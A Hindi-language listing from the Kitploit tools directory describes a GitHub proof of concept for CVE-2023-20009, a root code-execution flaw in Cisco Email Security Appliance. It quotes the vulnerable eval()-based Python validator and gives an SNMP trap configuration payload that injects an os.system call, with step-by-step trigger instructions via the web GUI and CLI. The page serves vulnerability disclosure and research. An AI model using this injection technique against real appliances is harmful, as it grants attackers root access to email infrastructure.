Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cisco-CVE-2023-20009 — Cisco Email Security Appliance: रिमोट कोड निष्पादन - कॉन्फ़िग फ़ाइल से RCE | Kitploit
उपकरण/GitHubGitHub/ly1g3/cisco-cve-2023-20009
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubly1g3/cisco-cve-2023-20009

cisco-CVE-2023-20009

Cisco Email Security Appliance: रिमोट कोड निष्पादन - कॉन्फ़िग फ़ाइल से RCE

रिपॉजिटरी देखें
11 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

परिचय

सुरक्षा शोधकर्ता: ly1g3, ly1g3[at]tuta.io

GPG फ़िंगरप्रिंट: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

अवलोकन: कॉन्फ़िगरेशन फ़ाइल से रिमोट कोड निष्पादन - RCE

CVE: CVE-2023-20009

समयरेखा:

  • खोज - ly1g3
  • सूचित - ly1g3
  • हल - Cisco

Cisco AsyncOS 14.2.0

ESA (Cisco Secure Email) और Cisco Secure Email और Web Manager

विशेषाधिकार वृद्धि - रूट शेल

एक प्रमाणित उपयोगकर्ता, जिसके पास SNMP-config की अनुमतियाँ हैं, एक विशेष रूप से निर्मित SNMP ट्रैप कॉन्फ़िगरेशन का उपयोग करके रूट के रूप में मनमाना कोड निष्पादित कर सकता है।

तकनीकी

शोषित कोड ui_checker.py:

root@kitploit:~
def validate_trap_configuration(base, value_dict):
    validators = eval('read_var_auto_level_wrapper("snmp.%s_traps.configuration_class", non_editable_var=True)' % (base,))
    for k, v in value_dict.iteritems():
        if validators.has_key(k):
            base, conf_class_str = validators[k].rsplit('.', 1)
            module = __import__(base, fromlist=[conf_class_str])
            conf_class = eval('module.%s("%s")' % (conf_class_str, v))
        else:
            raise FilterError('validate_%s_trap_configuration_value' % (base,),
                              _("Trap does not allow configuration"), k)
    return value_dict

v में common_trap.common_configuration का मान होगा।

root@kitploit:~
<common_trap>
    <common_name>connectivityFailure</common_name>
    <common_enabled>0</common_enabled>
    <common_configuration>http://asd.asd.&quot;+os.system(&quot;touch test.txt&quot;))#,5</common_configuration>
    </common_trap>
<common_trap>

WEB-GUI का उपयोग करके ट्रिगर करने के चरण:

  1. https://192.168.1.10/system_administration/configuration_file
  2. "स्थानीय कंप्यूटर से एक कॉन्फ़िगरेशन फ़ाइल लोड करें"
  3. वर्तमान connectivityFailure फ़ील्ड को ऊपर दिए गए पेलोड से बदलें

CLI का उपयोग करके ट्रिगर करने के चरण

  1. loadconfig
  2. पेलोड पेस्ट करें
टूल डाउनलोड करें